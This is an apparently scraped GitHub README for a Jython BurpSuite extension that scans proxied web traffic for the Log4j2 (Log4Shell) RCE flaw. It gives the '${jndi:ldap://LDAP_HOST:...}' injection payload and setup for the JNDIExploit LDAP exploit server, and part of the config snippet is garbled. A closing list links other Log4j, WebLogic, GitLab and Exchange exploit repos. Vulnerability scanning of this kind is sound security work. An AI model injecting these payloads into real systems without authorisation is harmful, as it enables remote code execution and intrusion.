BurpSuite Extension: Log4j2 RCE Scanner

Overview

Log4j2 RCE Scanner

作者:key@元亨实验室

声明:由于传播、利用本项目所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,项目作者不为此承担任何责任。

小广告:实验室纳新招人,岗位方向有安全研究(攻防、漏洞)、威胁情报(APT分析)、内部安全(SDL、安全研发),简历投递至邮箱:c2VjdXJpdHlAemhvbmdmdS5uZXQ=

前言

这是一个用于扫描近期爆出的Log4j2 RCE漏洞的BurpSuite插件,其原理就是基于BurpSuite提供的被动式扫描API,对流经Burp Proxy模块的流量进行全量扫描,扫描作用域为:请求参数(JSON字段、正常请求参数、Cookie参数、XML字段、Mulitpart)、请求头(请求自带请求头与自定义请求头)。

它与其他插件的区别:

  1. 一个点一个Payload(Hash区分),便于追踪漏洞位置;
  2. 仅支持LDAP Log接口,不支持DNS扫描探测,便于快速定位有效漏洞位置进行自查自检;
  3. 使用Python(Jython)编写,可以非常快速的进行二次开发、代码阅读,例如你可以改造这个项目为SQL注入、XSS盲打的探测插件;
  4. 支持扫描作用域相对较全。

使用方法

  1. 准备工作:该插件用Python(Jython)所写,所以需要你的BurpSuite加载Jython的Jar包,下载地址:https://repo1.maven.org/maven2/org/python/jython-standalone/2.7.2/jython-standalone-2.7.2.jar ,BurpSuite加载位置:BurpSuite - Extender - Options - Python Environment - Location of Jython standalone JAR file。

  2. 准备LDAP Log接口:由于插件的特殊性,在不更改插件代码的情况下,建议你准备一台服务器,在上面部署LDAP服务并提供一个Web API给到插件,这里推荐Command2API项目,搭配JNDIExploit使用。

    python Command2Api.py "java -jar JNDIExploit.v1.2/JNDIExploit-1.2-SNAPSHOT.jar -i 0.0.0.0" 9889

  3. 填写配置:下载Python文件到本地,存储在无空格、无特殊符号、无中文的目录下,接着替换如下代码:

    LDAP 服务的主机地址(域名/IP,请注意内、外网环境) # LDAP_PORT -> LDAP 服务的主机端口 return self._helpers.urlEncode("${jndi:ldap://LDAP_HOST:LDAP_PORT/" + random_md5 + "}")">
    # LDAP_API_HOST -> LDAP Log接口的主机地址(域名/IP,请注意内、外网环境)
    # LDAP_API_PORT -> LDAP Log接口的主机端口
    # LDAP_API_PORT -> LDAP Log接口的路由
    # 建议搭配Command2API项目一起使用,其他接口请自行更改代码
    url = "http://LDAP_API_HOST:LDAP_API_PORT/LDAP_API_ROUTE"
    # LDAP_HOST -> LDAP 服务的主机地址(域名/IP,请注意内、外网环境)
    # LDAP_PORT -> LDAP 服务的主机端口
    return self._helpers.urlEncode("${jndi:ldap://LDAP_HOST:LDAP_PORT/" + random_md5 + "}")

  4. 加载插件:BurpSuite加载位置:BurpSuite - Extender - Extensions - Burp Extensions - Add。

  5. 开始扫描:浏览器挂上BurpSuite代理,让流量流经BurpSuite,插件会自动扫描,或者你可以选择结合爬虫的方式将爬虫流量过到BurpSuite进行扫描。

  6. 扫描结果:扫描结果会在Burp Dashboard中展示出来,并且有具体的请求报文,如下图所示,分别是Command2API与LDAP服务接收的日志(由于该漏洞的触发特殊性,建议对这些日志和BurpSuite流量进行保存)以及Burp的扫描结果。

You might also like...
Scan all java processes on your host to check weather it's affected by log4j2 remote code execution

Log4j2 Vulnerability Local Scanner (CVE-2021-45046) Log4j 漏洞本地检测脚本,扫描主机上所有java进程,检测是否引入了有漏洞的log4j-core jar包,是否可能遭到远程代码执行攻击(CVE-2021-45046)。上传扫描报告到指定的服

log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

说明 about author: 我超怕的 blog: https://www.cnblogs.com/iAmSoScArEd/ github: https://github.com/iAmSOScArEd/ date: 2021-12-20 log4j2 dos exploit log4j2 do

Log4j2 intranet scan
Log4j2 intranet scan

Log4j2-intranet-scan ⚠️ 免责声明 本项目仅面向合法授权的企业安全建设行为,在使用本项目进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权 如您在使用本项目的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任 在使用本项目前,请您务

A tool to find good RCE From my series: A powerful Burp extension to make bounties rain

A tool to find good RCE From my series: A powerful Burp extension to make bounties rain

A Burp Pro extension that adds log4shell checks to Burp Scanner

scan4log4shell A Burp Pro extension that adds log4shell checks to Burp Scanner, written by Daniel Crowley of IBM X-Force Red. Installation To install

WebLogic T3/IIOP RCE ExternalizableHelper.class of coherence.jar
WebLogic T3/IIOP RCE ExternalizableHelper.class of coherence.jar

CVE-2020-14756 WebLogic T3/IIOP RCE ExternalizableHelper.class of coherence.jar README project base on https://github.com/Y4er/CVE-2020-2555 and weblo

Gitlab RCE - Remote Code Execution

Gitlab RCE - Remote Code Execution RCE for old gitlab version = 11.4.7 & 12.4.0-12.8.1 LFI for old gitlab versions 10.4 - 12.8.1 This is an exploit f

com_media allowed paths that are not intended for image uploads to RCE
com_media allowed paths that are not intended for image uploads to RCE

CVE-2021-23132 com_media allowed paths that are not intended for image uploads to RCE. CVE-2020-24597 Directory traversal in com_media to RCE Two CVEs

exchange-ssrf-rce

Usage python3 .\exchange-exp.py -------------------------------------------------------------------------------- |

Owner
ᴋᴇʏ
(ATT&DEF)er, 博客地址如下所示: Gh0st.cn - 魂魄 Shad0w.cn - 暗影 D4rk.cn - 暗黑 Dem0n.cn - 恶魔
ᴋᴇʏ
log4j2 passive burp rce scanning tool get post cookie full parameter recognition

log4j2_burp_scan 自用脚本log4j2 被动 burp rce扫描工具 get post cookie 全参数识别,在ceye.io api速率限制下,最大线程扫描每一个参数,记录过滤已检测地址,重复地址 token替换为你自己的http://ceye.io/ token 和域名地址

null 5 Dec 10, 2021
A BurpSuite extension to parse 5GC NF OpenAPI 3.0 files to assess 5G core networks

5GC_API_parse Description 5GC API parse is a BurpSuite extension allowing to assess 5G core network functions, by parsing the OpenAPI 3.0 not supporte

PentHertz 57 Dec 16, 2022
A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228

1.Create a Sample Vulnerable Application . 2.Start a netcat listner . 3.Run the exploit . 5.Use jdk1.8.0_20 for better results . Exploit-db - https://

Isuru Umayanga 7 Aug 6, 2022
An automated header extensive scanner for detecting log4j RCE CVE-2021-44228

log4j An automated header extensive scanner for detecting log4j RCE CVE-2021-44228 Usage $ python3 log4j.py -l urls.txt --dns-log REPLACE_THIS.dnslog.

null 2 Dec 16, 2021
Js File Scanner This is Js File Scanner

Js File Scanner This is Js File Scanner . Which are scan in js file and find juicy information Toke,Password Etc.

null 122 Dec 12, 2022
Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets.

Yuyu Scanner Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets. installation ! run as root

Justakazh 20 Nov 24, 2022
USSR-Scanner - USSR Scanner with python

Purposes ? Hey there is abosolutely no need to do this we do it only to irritate

Binary.club 2 Jan 24, 2022
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk

Fox-IT 431 Dec 22, 2022
logmap: Log4j2 jndi injection fuzz tool

logmap - Log4j2 jndi injection fuzz tool Used for fuzzing to test whether there are log4j2 jndi injection vulnerabilities in header/body/path Use http

之乎者也 67 Oct 25, 2022
Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

FaisalFs 16 Mar 24, 2022